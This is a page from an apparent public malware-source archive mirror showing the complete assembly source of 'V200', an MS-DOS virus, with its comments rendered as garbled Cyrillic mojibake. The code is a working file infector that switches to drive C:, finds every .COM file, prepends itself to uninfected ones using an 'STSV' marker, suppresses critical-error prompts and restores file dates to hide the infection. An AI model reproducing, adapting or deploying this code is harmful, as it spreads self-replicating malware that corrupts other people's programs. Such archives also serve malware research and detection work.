ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
bb32e71ff5
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.v200.asm
vxunderground 6bf46a48b9
Add files via upload
2021-01-12 18:04:54 -06:00

178 lines
6.7 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;------------------------------------------------------------------------------;
; ;
; ‚¨°³± V200 ;
; ;
; V200 ¥ ¯ ° §¨²¥­ ¢¨°³±, ¤¥©±²¢¨¥²® ¬³ ±¥ ±º±²®© ¢ ±«¥¤­®²® - ¯°¨ ±² °²¨° ­¥;
; ­  § ° §¥­ ´ ©« ¢¨°³±º² ¯°¥²º°±¢  ¶¿« ²  ²¥ª³¹  ¤¨°¥ª²®°¨¿ ¨ § ° §¿¢  ¢±¨·ª¨ ;
; COM - ´ ©«®¢¥,¢ ±«³· ©,·¥ ¢ ±¨±²¥¬ ²  ¨¬  ³±²°®©±²¢® C: ²¥§¨ ¤¥©±²¢¨¿ ±¥ ;
; ¨§¯º«­¿¢ ² ¢ ­¥£®¢ ²  ²¥ª³¹  ¤¨°¥ª²®°¨¿. ;
; V200 ±¥ ­ ±² ­¿¢  ¯°¥¤¨ ª®¤  ­  § ° §¥­¨¿ ´ ©«, ¢¨°³±º² ®°£ ­¨§¨°  ;
; ±®¡±²¢¥­  ¯°®¶¥¤³°  §  ®¡° ¡®²ª  ­  ª°¨²¨·­¨ £°¥¸ª¨ (¢¥ª²®° 24h) ¨ ­¥ ¯°®¬¥­¿;
; ¤ ² ²  ¨ · ±  ­  § °¿§ ­¨²¥ ´ ©«®¢¥. ;
; ;
;------------------------------------------------------------------------------;
.model Tiny
.code
VirLen = 200
NewId = offset Mark - 100h
;-----------------------------------------------------------------------------;
ORG 0D0h
INT24 dw ? ; ’³ª ¹¥ ¡º¤¥ ­ ±®·¥­ ¢¥ª²®° 24h.
INT24a db ?
NewDTA db 15h dup (?) ; ‘²°³ª²³°  ­  DTA.
FAttr db ?
FTime dw ?
FDate dw ?
FLen dw ?, ?
FName db 0Dh dup (?)
;-----------------------------------------------------------------------------;
ORG 100h
Start:
push ax
mov INT24,3B0h ; <20>®¢ ¢¥ª²®° 24h : mov al,03
mov INT24a,0CFh ; iret
mov ax,2524h
mov dx,offset INT24
int 21h ; <20>°¥­ ±®·¢  ¢¥ª²®°  24h.
mov ah,19h
int 21h ; ˆ±ª  ®² „Ž‘ ²¥ª³¹®²® ³±²°®©±²¢®.
push ax ; ‡ ¯ §¢  ²¥ª³¹®²® ³±²°®©±²¢®.
mov ah,0Eh
mov dl,02h
int 21h ; ‘¬¥­¿ ²¥ª³¹®²® ³±²°®©±²¢® ­  C:
mov ax,cs
add ah,10h
mov es,ax ; ES = CS + 64KBytes
mov si,offset Start
xor di,di
mov cx,VirLen ; <20>°¥µ¢º°«¿ ª®¤  ­  ¢¨°³±  64KBytes
rep movsb ; ¯®-­ £®°¥ ¢ ¯ ¬¥²² .
mov dx,offset NewDTA ; <20>®±² ¢¿ DTA ­  ­®¢  ¤°¥±.
mov ah,1Ah
int 21h
;...... ‡ ¯®·¢  ²º°±¥­¥ ­  ´ ©«®¢¥ §  § ° §¿¢ ­¥.
mov dx, offset AllCom ; ’º°±¨ ¢±¨·ª¨ '*.COM' ´ ©«®¢¥.
mov cl,110B
mov ah,4Eh ; ˆ§¢¨ª¢  Find First.
int 21h
jc Done ; <20>°®¤º«¦ ¢  ­ ² ²ºª ¯°¨ «¨¯±  ­ 
; ´ ©«®¢¥ §  § ° §¿¢ ­¥.
FindNext:
mov dx,offset Fname ; dx  ¤°¥±  ­  ¨¬¥²® ­  ´ ©«  ®² DTA.
mov ax,3D02h ; Ž²¢ °¿ ´ ©«  §  § ¯¨±/·¥²¥­¥.
int 21h
mov bx,ax ; ‡ ¯ §¢  ­®¬¥°  ­  ®²¢®°¥­¨¿ ´ ©«.
push ds ; ‡ ¯ §¢  DS.
push es
pop ds ; <20>°®·¨²  ±¥ ¶¥«¨¿ ´ ©« ­   ¤°¥± -DS:DX
mov dx,VirLen ; DS = CS + 64KBytes
mov cx,0FFFFh ; DX = ¤º«¦¨­ ²  ­  ¢¨°³± 
mov ah,3Fh ; ’ ¬ ±¥ ­ ¬¨°  ¢¨°³± ,  ±¥£  ±«¥¤ ­¥£®
int 21h ; ¨ ´ ©«º².
add ax,VirLen ; “¢¥«¨· ¢  ¤º«¦¨­ ²  ­  ´ ©« (AX) ±
mov si,ax ; ¤º«¦¨­ ²  ­  ¢¨°³±  ¨ ¿ § ¯ §¢  ¢ SI.
cmp Word ptr ds:[NewId+VirLen],'TS' ; „ «¨ ´ ©«º² ¥ § ° §¥­ ¢¥·¥ ?
je Close
xor cx,cx
xor dx,dx
mov ax,4200h ; <20>°¥¬¥±²¢  ±¥ ³ª § ²¥«¿ ­  ´ ©«  ¢
int 21h ; ­ · «®²® ¬³.
mov cx,si
mov ah,40h ; Ž²  ¤°¥±  DS:DX ±¥ § ¯¨±¢  ­  ¤¨±ª 
int 21h ; ¢¨°³± + ´ ©«
mov cx,cs:FTime
mov dx,cs:FDate
mov ax,5701h ; ‚º§±² ­®¢¿¢ ² ±¥ ¤ ² ²  ¨ ¢°¥¬¥²® ­ 
int 21h ; § ° §¿¢ ­¨¿ ´ ©« ®² DTA.
Close:
pop ds ; ‚º§±² ­®¢¿¢  DS.
mov ah,3Eh ; ‡ ²¢ °¿ ´ ©« .
int 21h
mov ah,4Fh
int 21h ; ˆ§¢¨ª¢  Find Next,
jnc FindNext ;  ª® ¨¬  ®¹¥ ´ ©«®¢¥ ¢±¨·ª® ±¥ ¯®¢² °¿
; ¨ §  ²¿µ.
Done:
mov dx,80h
mov ah,1Ah
int 21h ; ‚º§±² ­®¢¿¢  ±¥ ±² °¨¿  ¤°¥± ­  DTA.
pop dx
mov ah,0Eh
int 21h ; ‚º§±² ­®¢¿¢  ±¥ ²¥ª³¹¨¿ § ¢ °¥­ ¤¨±ª.
;....... <20> · «® ­  ±² °²¨° ­¥ ­  ¯°®£° ¬ ²  ªº¬ ª®¿²® ¥ § ª ·¥­ ¢¨°³± .
mov si,offset TransF
mov cx,offset EndCode - offset Transf
xor di,di ; Š®¯¨°  64KBytes ¯®-­ £®°¥ ¥¤­ 
rep movsb ; ±¯®¬ £ ²¥«­  · ±², ¨§¯®«§¢ ­ ¯®-¤®«³.
pop bx ; ‚º§±² ­®¢¿¢  ±º¤º°¦ ­¨¥²® ­  AX ¢ BX.
push es
push cx
RETF ; Ž²¨¢  ­   ¤°¥± ES:00
;.......................................
; Œ °ª¨°®¢ª  §  ° §¯®§­ ¢ ­¥ ­  § ° §¥­¨
Mark DB 'STSV' ; ´ ©«®¢¥.
AllCom db '*.COM',0 ; Œ ±ª  §  ²º°±¥­¥ ­  ¢±¨·ª¨ ´ ©«®¢¥
;.......................................; §  § ° §¿¢ ­¥.
TRansF:
push ds
pop es
mov si,offset EndCode
mov di,offset Start
dec cx
sub cx,si ; ‘¬ºª¢  ª®¤  ­  ¯°®£° ¬ ²  § ¯®·¢ ¹
rep movsb ; ­¥¯®±°¥¤±²¢¥­® ±«¥¤ ¢¨°³±  ± 100h ¡ ©² 
; ­ ¤®«³.
push ds
mov ax,100h
push ax
mov ax,bx ; ‚º§±² ­®¢¿¢  ±º¤º°¦ ­¨¥²® ­  AX.
RETF ; <20>°¥¤ ¢  ³¯° ¢«¥­¨¥²® ­  ¯°®£° ¬ ² 
; ­   ¤°¥± DS:100h.
;-----------------------------------------------------------------------------;
EndCode:
int 20h ; Ž² ²³ª § ¯®·¢  § ° §¥­ ²  ¯°®£° ¬ 
End Start

Reference in New Issue View Git Blame Copy Permalink